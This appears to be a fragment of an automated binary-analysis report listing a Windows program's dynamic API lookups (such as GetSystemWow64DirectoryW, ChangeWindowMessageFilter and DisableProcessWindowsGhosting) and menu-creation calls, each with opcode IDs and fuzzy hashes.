                                                                                    • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                    • API String ID: 1883125708-2866557904
                                                                                    • Opcode ID: e7dab807d206312efdb0421e04762fd5465d9bb62d82bfaba76103e697829b8c
                                                                                    • Instruction ID: 40c05ee6389ba05014c80f0bb6a4273d02a3409cfaf78f9ef14993339606f823
                                                                                    • Opcode Fuzzy Hash: e7dab807d206312efdb0421e04762fd5465d9bb62d82bfaba76103e697829b8c
                                                                                    • Instruction Fuzzy Hash: 14E0C2633A1E512E538072FA2CA1CEF088C9DA6A5A3900C36F505E3152D948DC02017D
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemWow64DirectoryW,?,005F8CBC,00000000,005F8D8E,?,?,0066978C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005B0A0A
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                    • API String ID: 1646373207-1816364905
                                                                                    • Opcode ID: c75330aa7c8c5df12c7e8eb959d8e15b84fad59c46a3f443c355cdc9ba688192
                                                                                    • Instruction ID: 6e2db57afe9603e13bbcb28d8d27c56aba657c1237ebb3fd90a72f709f2b52c2
                                                                                    • Opcode Fuzzy Hash: c75330aa7c8c5df12c7e8eb959d8e15b84fad59c46a3f443c355cdc9ba688192
                                                                                    • Instruction Fuzzy Hash: AEE0266178070013DB00A2BA4D83EEF158A5B94700F105C3D7999D62D2EDBCE88082A2
                                                                                    APIs
                                                                                    • CreatePopupMenu.USER32(?,00586606,?,?,00000000,?,00586587,?,0058BE31,0059C47C), ref: 00586722
                                                                                    • CreateMenu.USER32 ref: 0058672F
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: CreateMenu$Popup
                                                                                    • String ID: HOX
                                                                                    • API String ID: 257293969-2476314470
                                                                                    • Opcode ID: 3fef10723f1ca8ff26ecb47d99a67e8efce527985917f034024353e37165076f
                                                                                    • Instruction ID: 16515f4fc79d7f94603b2a7c1aa1a4c0f70e6e138b00580e915dac0b9c35f144
                                                                                    • Opcode Fuzzy Hash: 3fef10723f1ca8ff26ecb47d99a67e8efce527985917f034024353e37165076f
                                                                                    • Instruction Fuzzy Hash: F5F0C930604201CFDB00BF66D5C9B887B92BB55308F8454B9AC45AF25BD77488448FB1
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005B1CA2,?,00000004,006619DC,006006F2,00600B6C,00600610,?,00000B06,00000000,00000000), ref: 005B1BC3
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                    • API String ID: 1646373207-2498399450
                                                                                    • Opcode ID: 32f4064eec838c34c8f47ef9a1994eb5c6ace0f1976ee1f6d02c9e7c94af625d
                                                                                    • Instruction ID: 8c40f62a632f2fa97ec710fedad9e0295ca43648f38e841b9d187b64430073cf
                                                                                    • Opcode Fuzzy Hash: 32f4064eec838c34c8f47ef9a1994eb5c6ace0f1976ee1f6d02c9e7c94af625d
                                                                                    • Instruction Fuzzy Hash: 5DE09A75220700DFD781AF64AC88FDA3FE9F708B01F002819F544921A0D6F818C0CA28
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005B1D06,?,?,?,0064F751,0000000A,00000002,00000001,00000031,00000000,0064F97F), ref: 005B1D96
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                    • API String ID: 1646373207-260599015
                                                                                    • Opcode ID: 2d118afa1acb73877a63b6e6f87aa342629fa191858680dbd20951d3b7f32472
                                                                                    • Instruction ID: cfd2a97203f557c8c57e6b3927d22065e7e78818251efbac2aa6542449ac9364
                                                                                    • Opcode Fuzzy Hash: 2d118afa1acb73877a63b6e6f87aa342629fa191858680dbd20951d3b7f32472
                                                                                    • Instruction Fuzzy Hash: 23D0A763351F222E179022F51EE1CEB068C9D242963440136FA00D2100D544DC4012AC
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0065C502,00000001,00000000,0065C528), ref: 0065117A
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                    • API String ID: 1646373207-834958232
                                                                                    • Opcode ID: 03da989b8c341b0011cf5f2f54663901e78246e972d77ad5a530f748acd43f17
                                                                                    • Instruction ID: 5f29c36bf5ef2573be6bf32c1ba0481e8d956120234237a4d8ff77b8e3f328bd
                                                                                    • Opcode Fuzzy Hash: 03da989b8c341b0011cf5f2f54663901e78246e972d77ad5a530f748acd43f17
                                                                                    • Instruction Fuzzy Hash: C3B01265281F00310B7033F30F43FDB044A0C93B4BF0245D97F00D9092CD58C0490039